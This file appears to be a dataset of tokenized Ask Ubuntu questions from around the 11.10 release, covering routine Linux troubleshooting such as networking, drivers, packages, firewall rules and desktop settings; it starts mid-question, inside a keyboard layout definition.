[ 4 , dollar , dead_doubleacute , dead_doubleacute ] } ; // 4 $ key < ae05 > { [ 5 , percent , dead_doubleacute , dead_doubleacute ] } ; // 5 % key < ae06 > { [ 6 , ampersand , dead_doubleacute , dead_doubleacute ] } ; // 6 & key < ae07 > { [ 7 , slash , dead_doubleacute , dead_doubleacute ] } ; // 7 / key < ae08 > { [ 8 , parenleft , dead_doubleacute , dead_doubleacute ] } ; // 8 ( key < ae09 > { [ 9 , parenright , dead_doubleacute , dead_doubleacute ] } ; // 9 ) key < ae10 > { [ 0 , equal , dead_doubleacute , dead_doubleacute ] } ; // 0 = key < ae11 > { [ apostrophe , question , dead_doubleacute , dead_doubleacute ] } ; // ' ? key < ae12 > { [ igrave , asciicircum , dead_doubleacute , dead_doubleacute ] } ; // ì ^ key < bksl > { [ cyrillic_io , cyrillic_io , braceleft , braceright ] } ; // ё ё { } key < lsgt > { [ less , greater , dead_doubleacute , dead_doubleacute ] } ; // < > key < tlde > { [ backslash , bar , dead_doubleacute , dead_doubleacute ] } ; // \ | include `` level3 ( ralt_switch ) '' } ; lines from evdev.xml file are these : < layout > < configitem > < name > ru_it < /name > < shortdescription > ruit < /shortdescription > < description > `` russian ( on italian keyboard ) '' < /description > < languagelist > < iso639id > rus < /iso639id > < /languagelist > < /configitem > < /layout > is there some one who can help me to understand how i can solve this thing ?
89372	internet connection fickle with 11.10 , fine with 10.04 live cd	i am having trouble connecting to my wireless network with 11.10 . but when i boot up with my 10.04 live cd , everything works just fine . does anybody have a clue what the problem might be ? what follows is a rather long exposition explaining the things i 've done so far : i installed ubuntu 10.04 from a cd 2 days ago . i entered the password for my network , and connected flawlessly . i then went through the process of upgrading to 11.10 , one version at a time . my internet was still okay for the rest of the day . next day i boot up . i am prompted for my network password . i enter it , then wait . i 'm prompted again , and again and again . after a while i decide to reboot with my 10.04 disc . i enter my password , everything is fine . i reboot to 11.10 , and things are working again , no problems for the rest of the day . today , same story . i boot up 11.10 , enter password , again , again , again . try out a kubuntu 11.10 disc , no dice . then back to my 10.04 disc and i 'm good . now i try going back to 11.10 , not working . back to 10.04 , working . back to 11.10 , not working . back to 10.04 , working . and that 's where i am now , running 10.04 from a live cd . in case you are wondering , yes i am absolutely certain that i am entering the correct password . details about my system : here is my pci info : http : //www.pasteall.org/27577/text i assume the network card is most relevant here : 01:09.0 network controller : atheros communications inc. ar5008 wireless network adapter ( rev 01 ) here 's my usb info , though i do n't believe there 's anything relevant there : http : //www.pasteall.org/27578/text the following is the results of dmesg with a filter of grep -i network : http : //www.pasteall.org/27579/text this is udev with the same filter : http : //www.pasteall.org/27580/text sudo lshw -class network gives : http : //www.pasteall.org/27581/text
89373	nautilus launchers stopped working properly	i have been trying to make a launcher with a quicklist item for 'root file browser ' using command 'gksudo nautilus ' . after i updated to this launcher in the unity sidebar , each time i click the icon ( which still points to the normal nautilus for left click ) a separate nautilus icon appears elsewhere in the sidebar with the title 'files ' . i really want it to appear under the same icon in the sidebar . i copied the nautilus-home.desktop from /usr/share/applications . here is the contents of the nautilus-home.desktop file in ~/.local/share/applications [ desktop entry ] name=file browser comment=open your personal folder exec=nautilus icon=user-home terminal=false startupnotify=true type=application onlyshowin=gnome ; unity ; categories=gnome ; gtk ; core ; x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=nautilus x-gnome-bugzilla-component=general x-gnome-bugzilla-version=3.0.0 x-ubuntu-gettext-domain=nautilus x-ayatana-desktop-shortcuts=root [ root shortcut group ] name=root file browser exec=gksudo nautilus targetenvironment=unity i hope this helps .
89378	not able to wakeup after suspend on an hp 430	i installed 11.10 ( 32-bit ) with all the updates on hp 430 notebook . everything works fine except the supsend/resume option . the notebook goes into suspension , but does not resume back when i press the power or any other button . i do n't know where to start debugging the problem . could someone provide me pointers ?
89381	how do i install a theme ?	i 'm using ubuntu 11.10 and i want to change the theme . i downloaded a theme off of `` gnome-look.org '' and it 's not working . i ran the sudo cp -r command in terminal to copy the downloaded folder to the system 's theme folder , but it does n't show up in `` advanced settings '' . how do i fix this ? did i do something wrong ? can only certain themes work in ubuntu 11.10 ?
89382	ubuntu 10 or 11 installation on macmini server 5,3	i have the latest macmini server with the i7 quad core running osx lion server . has anyone had any luck getting ubuntu 10 or 11 to run on the latest macmini 's ? ( 5,3 )
89383	start problem with radeon	trying to boot on new amd a8 laptop running ati radeon card a 6470 . the laptop gives black screen . tried to set nomodeset by putting it before quite splash ( nomedeset worked for installation ) . however when i boot after a string of commands she hangs and i get stopping automatic crash report generation [ fail ] then after battery check laptop just hangs . anyone resolved this problem ?
89386	why do n't my fn keys work for brightness or media after upgrading ?	i recently upgraded from 11.04 to 11.10 . after the upgrade , i can no longer adjust the screen brightness or the volume using keyboard ( before the upgrade , using fn+f4 , fn+f11 , etc . worked ) . using fn+f2 to disable wireless still works , so i guess the fn key itself is being recognised . i tried to follow the instructions here , but i do n't have a file in /etc/x11 called xorg.conf . i also tried following this workaround , but it had no noticeable effect . i 've also tried going to settings â keyboard â shortcuts and reassigning the brightness and volume controls , both to the default keys and to new combinations . these changes do n't have an effect even after rebooting . googling has found bug reports where pressing the media keys brings up a `` no entry sign '' rather than changing the volume . when i press the keys there 's no response at all . i 've also seen various people say a workaround is to have totem running in the background ; this does n't work for me either . finally , i tried installing keytouch ; i was able to install keytouch-editor but got the message `` unable to locate package keytouch '' . any more ideas ? i 'd be very grateful if anyone could help me ( even by pointing to a thread i 've missed ) !
89389	how to solve configure : error : readline library not found ?	i have an ubuntu 10.04 lts server with a minimal install that i want to compile postgres on . with the minimal install the server did not have gcc so i had to do an apt-get install gcc but now i keep getting this error from the postgres ./configure . configure : error : readline library not found i ca n't seem to find the name of the package that contains the readline library . so i have two questions . what is the name of the package that contains readline ? is there some way given the error message above for me to find the associated package from its standard name ?
89390	safe adding and removing cron jobs from shell script ?	i need to create a package , which should add itself to list of cron jobs , and remove it from that list on deinstallation . how can i do it without possibility of screwing the crontab file ? maybe there are some utils ?
89393	how to search entire hard drive for a file ?	trying to locate a file , how can i search the entire hard drive for a file ?
89400	who compiles all the packages that are part of ubuntu ?	when an ubuntu release is being made who compiles all the versions of the programs that are part of ubuntu and determines which version will ship with the release . for example , which version of postgres , or open office , or firefox ? do paid canonical employees do the compiling and selection of packages or is it pushed to community members to select and compile packages for a release ?
89401	first update after fresk kubuntu install hangs because of dpkg - now what ?	i installed a clean kubuntu 11.10 64bit on a dell latitude e6500 . rebooted after install , ran the update manager muon first thing , said apply all upgrades , and then at 57 % ( `` running dpkg '' ) the progress bar freezes and that 's it . no external drive attached , plenty of space on the hard drive , and this is the third clean install attempt . ( on that same computer , ubuntu 11.10 and mint 11 worked just fine ) . any ideas ?
89403	upgrade from 32bit to 64bit ?	i 've got a pc with a 64-bit processor but somehow got stuck on the 32-bit version of 11.10 . is there some way to switch to 64-bit without having to back everything up and do a clean install ?
89408	how do i fix a bad ppa installed in ubuntu ?	i installed this pidgin ppa after a clean ubuntu 11.10 64bit install : https : //launchpad.net/~pidgin-developers/+archive/ppa/+files/pidgin-ppa_0.0.5_all.deb i installed it like this : sudo dpkg -i pidgin-ppa_0.0.5_all.deb i think it worked then , because i believe my pidgin to had been updated back then . now when i do apt-get update , this is a part of the echo log : err http : //ppa.launchpad.net oneiric/main sources 404 not found err http : //ppa.launchpad.net oneiric/main amd64 packages 404 not found err http : //ppa.launchpad.net oneiric/main i386 packages 404 not found w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what should i do to fix the above ? it 's very annoying . i think the easiest would be to erase the ppa , but i do n't know how to do it properly .
89410	removing gnome-screensaver also wants to remove gnome-core	i am on ubuntu 11.10 . i hope to be able to replace gnome-screensaver with xscreensaver . i have read instructions on many sites that one simply uninstalls gnome-screensaver and then installs xscreensaver . however , when i request removing gnome-screensaver , the system wants to remove much more than just the gnome-screensaver . thegeeko61 > sudo apt-get remove gnome-screensaver reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : gnome gnome-core gnome-screensaver 0 upgraded , 0 newly installed , 3 to remove and 0 not upgraded . after this operation , 483 kb disk space will be freed . do you want to continue [ y/n ] ? n abort . ( surely they can not collectively add up to only 483 kb . ) must i really remove gnome and gnome-core ?
89412	netbook launcher	i 'm using ubuntu 11.10 with gnome 3 in fallback mode , how can i install and launch ubuntu netbook launcher ? i found in synapting package manager , netbook-launcher package , but when i try to launch it from command line , i received this response : netbook-launcher : command not found
89415	how do i combine multiple pdf files to an a4 papersize output ?	currently i am using gs -spapersize=a4 -dbatch -dnopause -q -sdevice=pdfwrite soutputfile=combined.pdf input1.pdf input2.pdf input3.pdf for combining my pdf files , however i have noticed , that combined.pdf according to evince 's document properties has a paper size of `` 231 x 314 mm '' . is there a way to fix this ? thanks .
89417	how to span single wallpaper over dual monitors ?	i have dual monitor set up in ubuntu 11.10 . i want to have a single wallpaper spanned across both monitors . how do i do this ?
89425	pdf reader that supports tabs	i want a pdf that is sort of browser-like , i mean that you can open many pdfs and one session and navigate between them in tabs , foxit reader does that on windows , i do n't know about foxit reader on linux because i could n't install it , i get the same problem as this question here so would someone suggest a nice `` isntallable '' pdf reader that supports tabs , or just tell us a way to make foxit reader work here
89427	gparted 0.3 encounters problem with file system and wo n't resize partition	i tried using a gparted 0.3 startup disk to resize my partition in order to create a swap partition ( i had deleted it as i thought it an unneeded use of hd space , now i need it to use hibernation mode ) . unfortunately i could not do that as gparted reported a problem with the partition which i can not recall exactly . it might have had to do with the master boot record or the file system , but i might be wrong as my memory is betraying me . i took a screenshot using the gparted tool and it said that it was saved in /root . however , upon rebooting normally into my system i found no such screenshot when i accessed the /root folder ( i did sudo nautilus in the terminal and accessed /root that way ) i found no screenshot ( if i 'm looking in the incorrect folder and/or you know the name of the screenshot please tell me ) . some details : laptop make and model : clevo m55n hdd : 60gb , one extended partition and one logical partition os : ubuntu 11.10 ( exclusively ) bootloader : burg if you need any information to help me resolve this issue let me know . thanks beforehand .
89433	how do i change the resolution on an intel g31 ?	why ubuntu 11.10 do n't support intel g31 ? i can change resolution 1024x768 . my display is unknown ? i am new ubuntu user please help me , my motherboard is asus p5kpl-am .
89434	where are the customization options for gnome 3 ?	gnome 2.x in ubuntu 10.10 is highly customisable . how come all this has been locked down in 11.10 and gnome 3.x ? i enjoy using ubuntu because of this reason . now am i stuck with what i have when installing 11.10 ( just like mac and windows ) , or am i just being ignorant ?
89435	is it safe to remove all radeon packages ?	i am not able to boot ubuntu 10.11 due to a radeon card driver problem i have read nearly everything on the web now . my idea is to get into ubuntu at least and then download the latest driver . i have read to try sudo apt-get remove radeon-* but when i enter it i am warned that its harmful . can someone advise if its a good idea ? or any better ideas to at least get into ubuntu to see . thanks
89436	how to force filesystem checker to auto repair at boot	how to force fsck to auto repair at reboot ? my current situation is fsck will check and ask for user input for fix/ignore/ ... etc.. i want it to be auto repaired without asking any questions . thanks in advance
89437	how to install packages with apt-get on a system connected via proxy ?	i 've got an ubuntu 11.10 system connected via a proxy to the internet , and i would like to install packages via apt-get . when i try to do that i get this error message : sudo apt-get install libboost-program-options-dev [ ... ] err http : //gb.archive.ubuntu.com/ubuntu/ oneiric/main libboost1.46-dev i386 1.46.1-5ubuntu2 407 proxy authentication required any ideas ?
89440	is it possible to have better skype notifications ?	in ubuntu , i want to be notified in a customizable way when someone speaks in a skype conversation ( but not in group chat 'channels ' ) . the problem is : i have lots of windows open , so i often do n't notice when a new one appears in the taskbar , or if its icon changes . the built-in skype notifications are tiny , and disappear almost immediately , so i do n't notice them i tried using this script in the skype notification options , but it also disappears too quickly : notify-send `` % sname : '' `` % smessage '' -i skype-chat i tried using pidgin instead of skype , in the hope its notifications would be better , but it is missing too many features , e.g . listing bookmarked chats above my contact list is there some better notifications package i can use instead of notify-send ? or some other solution ?
89441	install mediawiki with postgresql instead of mysql	i need to install mediawiki with postgresql as database backend on an 10.04 server . i would prefer to install mediawiki via apt-get/aptitude but i do n't know how to configure the installation not to install the unneeded mysql . is it possible to change the dependencies from mysql to postgresql and if yes how can i do it ?
89442	java application launcher not staying in unity launcher	i 'm using intellij idea , which is a java application . when it runs ( invoked through dash ) it shows a launcher icon with no name . i 've tried several times to right-click and select `` keep in launcher '' , but no success - each time i close it the launcher icon disappears . i tried to use myunity to fix this , but it also fails . i do n't mind hacking this manually , but i do n't know where the launcher configs are stored or what to do . the relevant desktop file is shown below , and it works with the dash perfectly . [ desktop entry ] type=application name=intellij idea comment=intellij integrated development environment icon=/opt/intellij-idea-11/bin/idea48.png exec=/opt/intellij-idea-11/bin/idea.sh terminal=false startupwmclass=intellij_idea categories=development ; ide ; java ;
89447	how to bring the top panel to the bottom from command line ?	i would like to bring that top panel to bottom via command line . is there any command to do that from terminal ? i have searched everywhere , i have n't find one . can any one share a command to bring the top panel to bottom ? note : i just prefer command line coz i have to do it in all remote machines . i know the way to bring the panel to bottom via gui method .
89449	improving the quality of reduced website screenshots in gimp	i 'm trying to improve the quality of reduced screenshots of websites in gimp . this is waht i do : scale the image using the sinc interpolation . apply some blur ( 0.5 ) this is the result : i would like to know if the quality of my result is closer to this one : if not , what other techniques do you recommend to improve the screenshot ?
89452	can not boot ubuntu with a samsung dual graphics card 305v5a-s02 notebook	i need to download a driver for my graphics card as i cant boot ubuntu . how\where can i download it so i can run it from the laptop into ubuntu as i cant see anything . as i cant also save it to downloads if i only have windows to make the download and windows cant see\save to ubuntu downloads folder . thanks ok i have to set nomodeset first in f6 or it just freezes with cd going aver and over . doing this allows me to boot from from cd and work ok in live cd mode . i 've installed ubuntu . now i ca n't boot . taking out quietsplash , i tried nomodeset in my grub but only got to battery line.. have tried both 11.10 64bit and 32 bit on the samsung but have this boot issue after installation . could use a 10.04 cd which i can boot with on the samsung and use in `` try ubuntu mode '' ? ould use `` try ubuntu '' mode when booting from the 11.10 cd ( both 32bit and 64bit ) ? would it be worth installing 10.04 on the samsung would the radeon hd6470m driver be correct there or would it be better to try 11.04 maybe . please sigest.thanks nomodeset xforcevesa and xforcevesa just gives purple screen followed by purple screen with 20 % white virticle lines at top then goes to nothing only black screen and freeze . i ran try cd with nomodeset now after lspci | grep vga we have . 00:01.0 vga compatable controller : ati technologies inc device 9641 then ... 02:00.0 vga compatable controller : ati technologies inc ni seymour [ amd radeon h d 6470m ] . this is a brand new samsung 305v5a-s02 notebook which doesnt allow me to remove the extra graphics card . if i try to run sudo apt-get install fglrx -installer ... ... it tells me unable to locate fglrx -installer
89455	sql modeling and design tools ?	i would like to know which tool do you use for modeling tables , relationships , etc , generic database modeling , in ubuntu . it would be good if that tool generate sql scripts , and a plus with those scripts are sqlite compatible , but thats not necessary . currently , i am using enterprise architect for that under a virtual machine , which kind of sucks . i was able to run it under wine , but not as good as i want to . it is a complete tool for modeling anything in this world , and right now i do not need so much .
89457	is there ( or will be ) a u1 referrals program ?	dropbox and cx.com have referral programs in which you earn storage by referring friends . does ubuntu one have such a program too ?
89458	can i set default ssh options ?	i 'm talking about the client . i would like any ssh connection ( including those done through scp and gvfs , if possible ) to use the option serveraliveinterval=30 is there somewhere that i can push this option to globally change how ssh connections are made ?
89461	why wo n't ubuntu 11.10 wirelessly connect to my lenovo b570	i just bought this brand new lenovo b570 last week and the first thing i did was install ubuntu 11.10 but wheni tried to connect it through a wireless connection it just did n't at all . how can this be solved ? i really love ubuntu and it would be a massive disappointment if this can be solved . thanks !
89466	ubuntu 10.10 network not working	even few days go it was working perfectly . suddenly there is no internet . i ca n't even reach 192.168.0.1 . i 've a dual boot with window . with which i can reach to internet . lspci says : 01:02.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8169 gigabit ethernet ( rev 10 ) lshw -class network says i am using r1869 driver : *-network description : ethernet interface product : rtl-8169 gigabit ethernet vendor : realtek semiconductor co. , ltd. physical id : 2 bus info : pci @ 0000:01:02.0 logical name : eth0 version : 10 serial : 00:13 : d4:07:43:2f size : 100mb/s capacity : 1gb/s width : 32 bits clock : 66mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full latency=64 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mb/s resources : irq:17 ioport : a000 ( size=256 ) memory : d1000000-d10000ff memory:28000000-2801ffff and that r8169 module also appears in lsmod : r8169 36841 0 mii 4425 1 r8169 but there is no internet . what can i do ? edit ifconfig output : eth0 link encap : ethernet hwaddr 00:13 : d4:07:43:2f inet6 addr : fe80 : :213 : d4ff : fe07:432f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:18 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:500 ( 500.0 b ) tx bytes:3431 ( 3.4 kb ) interrupt:17 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:20 errors:0 dropped:0 overruns:0 frame:0 tx packets:20 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1200 ( 1.2 kb ) tx bytes:1200 ( 1.2 kb ) dmesg | grep eth says [ 11.955544 ] r8169 0000:01:02.0 : eth0 : rtl8110s at 0xe7f44000 , 00:13 : d4:07:43:2f , xid 04000000 irq 17 [ 14.128708 ] r8169 0000:01:02.0 : eth0 : link up [ 25.024009 ] eth0 : no ipv6 routers present
89467	shorewall is breaking packets/sessions when connecting out to internet	i am happy to forward any further data if required like firewall rules etc . would appreciate if someone can skim through my config and see if there are any glaring errors . problem : everything working perfectly well then suddenly the system stopped working ... ( without any changes from administrator ) ( perhaps as a result of an auto update ? ? ) all sessions through the firewall to the internet time out . sessions from or to the firewall ( eg . proxy , ssh , mail , etc ) all working fine . ping through the firewall works fine ( because its sessionless ? ) browsing through the server works 100 % if using the proxy but times out if going direct environment : ubuntu 10.4lts server kernel linux 2.6.32-37-generic-pae shorewall 4.4.6 iptables 1.4.4 pppoe v3.8 webmin manager v1.570 configuration iptable list root @ gateway2 : ~ # iptables -- list chain input ( policy drop ) target prot opt source destination dynamic all -- anywhere anywhere state invalid , new loc2fw all -- anywhere anywhere eth1_in all -- anywhere anywhere ppp0_in all -- anywhere anywhere accept all -- anywhere anywhere accept all -- anywhere anywhere state related , established reject all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `input : reject : ' reject all -- anywhere anywhere [ goto ] chain forward ( policy drop ) target prot opt source destination dynamic all -- anywhere anywhere state invalid , new loc_frwd all -- anywhere anywhere eth1_fwd all -- anywhere anywhere ppp0_fwd all -- anywhere anywhere accept all -- anywhere anywhere state related , established reject all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `forward : reject : ' reject all -- anywhere anywhere [ goto ] chain output ( policy drop ) target prot opt source destination fw2loc all -- anywhere anywhere fw2net all -- anywhere anywhere fw2net all -- anywhere anywhere accept all -- anywhere anywhere accept all -- anywhere anywhere state related , established reject all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `output : reject : ' reject all -- anywhere anywhere [ goto ] chain drop ( 2 references ) target prot opt source destination all -- anywhere anywhere reject tcp -- anywhere anywhere tcp dpt : auth /* auth */ dropbcast all -- anywhere anywhere accept icmp -- anywhere anywhere icmp fragmentation-needed /* needed icmp types */ accept icmp -- anywhere anywhere icmp time-exceeded /* needed icmp types */ dropinvalid all -- anywhere anywhere drop udp -- anywhere anywhere multiport dports loc-srv , microsoft-ds /* smb */ drop udp -- anywhere anywhere udp dpts : netbios-ns : netbios-ssn /* smb */ drop udp -- anywhere anywhere udp spt : netbios-ns dpts:1024:65535 /* smb */ drop tcp -- anywhere anywhere multiport dports loc-srv , netbios-ssn , microsoft-ds /* smb */ drop udp -- anywhere anywhere udp dpt:1900 /* upnp */ dropnotsyn tcp -- anywhere anywhere drop udp -- anywhere anywhere udp spt : domain /* late dns replies */ chain reject ( 4 references ) target prot opt source destination all -- anywhere anywhere reject tcp -- anywhere anywhere tcp dpt : auth /* auth */ dropbcast all -- anywhere anywhere accept icmp -- anywhere anywhere icmp fragmentation-needed /* needed icmp types */ accept icmp -- anywhere anywhere icmp time-exceeded /* needed icmp types */ dropinvalid all -- anywhere anywhere reject udp -- anywhere anywhere multiport dports loc-srv , microsoft-ds /* smb */ reject udp -- anywhere anywhere udp dpts : netbios-ns : netbios-ssn /* smb */ reject udp -- anywhere anywhere udp spt : netbios-ns dpts:1024:65535 /* smb */ reject tcp -- anywhere anywhere multiport dports loc-srv , netbios-ssn , microsoft-ds /* smb */ drop udp -- anywhere anywhere udp dpt:1900 /* upnp */ dropnotsyn tcp -- anywhere anywhere drop udp -- anywhere anywhere udp spt : domain /* late dns replies */ chain dropbcast ( 2 references ) target prot opt source destination drop all -- anywhere anywhere addrtype match dst-type broadcast drop all -- anywhere base-address.mcast.net/4 chain dropinvalid ( 2 references ) target prot opt source destination drop all -- anywhere anywhere state invalid chain dropnotsyn ( 2 references ) target prot opt source destination drop tcp -- anywhere anywhere tcp flags : ! fin , syn , rst , ack/syn chain dynamic ( 2 references ) target prot opt source destination chain eth1_fwd ( 1 references ) target prot opt source destination smurfs all -- anywhere anywhere state invalid , new tcpflags tcp -- anywhere anywhere net_frwd all -- anywhere anywhere chain eth1_in ( 1 references ) target prot opt source destination smurfs all -- anywhere anywhere state invalid , new tcpflags tcp -- anywhere anywhere net2fw all -- anywhere anywhere chain fw2loc ( 1 references ) target prot opt source destination accept udp -- anywhere anywhere udp dpts : bootps : bootpc accept all -- anywhere anywhere state related , established accept all -- anywhere anywhere reject all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `fw2loc : reject : ' reject all -- anywhere anywhere [ goto ] chain fw2net ( 2 references ) target prot opt source destination accept udp -- anywhere anywhere udp dpts : bootps : bootpc accept all -- anywhere anywhere state related , established accept icmp -- anywhere anywhere accept all -- anywhere anywhere chain loc2fw ( 1 references ) target prot opt source destination smurfs all -- anywhere anywhere state invalid , new accept udp -- anywhere anywhere udp dpts : bootps : bootpc tcpflags tcp -- anywhere anywhere accept all -- anywhere anywhere state related , established accept all -- anywhere anywhere chain loc2net ( 2 references ) target prot opt source destination accept all -- anywhere anywhere state related , established accept all -- anywhere anywhere chain loc_frwd ( 1 references ) target prot opt source destination smurfs all -- anywhere anywhere state invalid , new tcpflags tcp -- anywhere anywhere accept all -- anywhere anywhere loc2net all -- anywhere anywhere loc2net all -- anywhere anywhere chain log0 ( 1 references ) target prot opt source destination log all -- anywhere anywhere log level crit prefix `net2fw : accept : ' accept all -- anywhere anywhere chain log1 ( 1 references ) target prot opt source destination log all -- anywhere anywhere /* permit incoming traffic on certain ports */ log level info prefix `net2fw : accept : ' accept all -- anywhere anywhere /* permit incoming traffic on certain ports */ chain logdrop ( 0 references ) target prot opt source destination drop all -- anywhere anywhere chain logflags ( 5 references ) target prot opt source destination log all -- anywhere anywhere log level info ip-options prefix `logflags : drop : ' drop all -- anywhere anywhere chain logreject ( 0 references ) target prot opt source destination reject all -- anywhere anywhere chain net2fw ( 2 references ) target prot opt source destination accept all -- anywhere anywhere state related , established log0 tcp -- 192.168.1.99 anywhere [ goto ] tcp dpt : ssh drop icmp -- anywhere anywhere icmp echo-request /* ping */ log1 tcp -- anywhere anywhere [ goto ] tcp dpt : ssh /* permit incoming traffic on certain ports */ accept tcp -- anywhere anywhere tcp dpt : smtp /* allow mail on smtp , submission and imap */ accept tcp -- anywhere anywhere tcp dpt : ssmtp /* allow mail on smtp , submission and imap */ accept tcp -- anywhere anywhere tcp dpt : submission /* allow mail on smtp , submission and imap */ accept tcp -- anywhere anywhere tcp dpt : imap2 /* allow mail on smtp , submission and imap */ accept tcp -- anywhere anywhere tcp dpt : imaps /* allow mail on smtp , submission and imap */ drop all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `net2fw : drop : ' drop all -- anywhere anywhere chain net2loc ( 1 references ) target prot opt source destination accept all -- anywhere anywhere state related , established drop all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `net2loc : drop : ' drop all -- anywhere anywhere chain net_frwd ( 2 references ) target prot opt source destination net2loc all -- anywhere anywhere accept all -- anywhere anywhere accept all -- anywhere anywhere chain ppp0_fwd ( 1 references ) target prot opt source destination smurfs all -- anywhere anywhere state invalid , new tcpflags tcp -- anywhere anywhere net_frwd all -- anywhere anywhere chain ppp0_in ( 1 references ) target prot opt source destination smurfs all -- anywhere anywhere state invalid , new accept udp -- anywhere anywhere udp dpts : bootps : bootpc tcpflags tcp -- anywhere anywhere net2fw all -- anywhere anywhere chain reject ( 11 references ) target prot opt source destination drop all -- anywhere anywhere addrtype match src-type broadcast drop all -- base-address.mcast.net/4 anywhere drop igmp -- anywhere anywhere reject tcp -- anywhere anywhere reject-with tcp-reset reject udp -- anywhere anywhere reject-with icmp-port-unreachable reject icmp -- anywhere anywhere reject-with icmp-host-unreachable reject all -- anywhere anywhere reject-with icmp-host-prohibited chain shorewall ( 0 references ) target prot opt source destination chain smurfs ( 6 references ) target prot opt source destination return all -- default anywhere log all -- anywhere anywhere addrtype match src-type broadcast log level info prefix `smurfs : drop : ' drop all -- anywhere anywhere addrtype match src-type broadcast log all -- base-address.mcast.net/4 anywhere log level info prefix `smurfs : drop : ' drop all -- base-address.mcast.net/4 anywhere chain tcpflags ( 6 references ) target prot opt source destination logflags tcp -- anywhere anywhere tcp flags : fin , syn , rst , psh , ack , urg/fin , psh , urg logflags tcp -- anywhere anywhere tcp flags : fin , syn , rst , psh , ack , urg/none logflags tcp -- anywhere anywhere tcp flags : syn , rst/syn , rst logflags tcp -- anywhere anywhere tcp flags : fin , syn/fin , syn logflags tcp -- anywhere anywhere tcp spt:0 flags : fin , syn , rst , ack/syn
89469	are there any plans to make gtk3 apps look more native in kde ?	this is stopping me from upgrading to the latest version of kubuntu , and i realise that there are solutions out there but i would rather not have to resort to a third-party solution .
89470	dell n7110 i7 overheats and does n't boot when anything is plugged into the usb3 port	when i plug in any devices ( mouse , keyboard ) into usb 3.0 system dell n7110 overheats and fan goes crazy with terrible noise . so i 'm using 1 usb 2.0 slot now with a usb hub . it does n't solve the problem completely but system stays at a low fan rate for a longer time . i 've tried to lower cpu frequency , but in my case ( dell inspiron n7110 i7 on linux 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux ) cpu was pretty cool ( 51 c ) and still the same horrible fan noise . looks like there is no such problems with ubuntu 10.04 ( but there 're some other problems ) . ubuntu even does n't boot if anything is plugged into usb 3.0
89474	is there any mp3 player which has `` add to playlist '' option ?	i 'm trying to find an mp3 player which has `` add to playlist/enqueue '' option for ubuntu/xubuntu . i 'm looking for something similar to winamp or foobar . thank you . note : please do n't suggest foobnix , as it does n't have `` add to playlist '' option .
89475	how can i speed up the gui ?	i would like to ask if there are some possibilities for speeding up ubuntu a little . for example i do not need windows content to be visible while moving them , nor i need animations when launching the animations etc . thanks guys . i actually changed to ubuntu 2d and turned off everything there was to be found in bunch of tutorials . i was just wondering if it was possible to find some kind of options like that which are available for ex in windows : fit for best performance . as for my graphics card i have ati radeon x2100 ( integrated with mainboard ) . lspci | grep vga writes that my card is found and compatibile . i have installed open source drivers , so i assume my card works , however when checking system properties it says that graphics card is undefined . so does it work or not ? how to check it ?
89477	how to determine / make sure whether hard-disks have spun down when using `` hdparm '' options ?	i want to spin down some hard-disks when they are idle . so i used hdparm package . in the /etc/hdparm.conf i added following lines : command_line { hdparm -ss 241 /dev/sda } my intention was to spin down hard disk after 30 minutes of idle time . however , my problem is , how i know for sure whether hard disk has spun down ( assuming that it had exceed idle time of 30 minutes ) ? ? any ideas ? tips ? ? : ) : )
89487	should i install additional drivers ?	i 'm newbie to ubuntu . i have a laptop . this is designed for windows 7 . anyway i want to install ubuntu here . i used ubuntu server several times , but all in the virtual machines . so installation on physical machine is first time now . in windows 7 , i had to install many drivers to make it perform well . for example , intel 's chipset driver , storage driver , nic driver , and atheros ' wlan driver . actually wlan did n't even detected without the driver . should i install something like that driver on ubuntu to make it perform as its designed performance ? how about wlan ? i ca n't figure out how can i make the lan & wlan nics . i 'm using ubuntu server 10.04 lts . x64 .
89490	how to search for a string inside of multiple files ( in nested folder structure ) ?	i have a python project with nested folder structure src/ folder_1 folder_2 subfolder_1 subfolder_2 folder_3 subfolder_1 subsubfolder_1 subfolder_2 etc . i am looking for a piece of code and the project is too big to go through every file manually . is there a way to search for a string `` mystring '' inside all the files located in src or any subfolder of src ?
89495	fork : can not allocate memory	i am frequently getting : fork : can not allocate memory when running commands over ssh . i have 4 gb of ram and usually 2 gb free . this started happening since i upgraded to ubuntu 11.10 . i then need to repeatably run the command until it finishes successfully . i 'm connecting from my laptop to my server both from my home lan . some times happens even when i run apt-get . any idea why ?
89499	i have an errormessage in a localized ubuntu , how to get the english version of that message ?	sometimes i get an errormessage that i want to ask about here , but the errormessages are in my locale language . often this are not really reproducable , so that i cant switch to english and reproduce ... so how do i get the english version of that errormessage to ask a question about that problem here or can find answers ?
89503	gtile for unity ?	im testing gnome shell for this week now and the shell-extension gtile https : //extensions.gnome.org/extension/28/gtile/ is a big advantage for gnome shell imho . i want to switch back to unity at the end of the week . is there something similar to gtile for unity ? i think its the first `` tiling-manager '' made for the masses . i would apreciate something like that for unity .
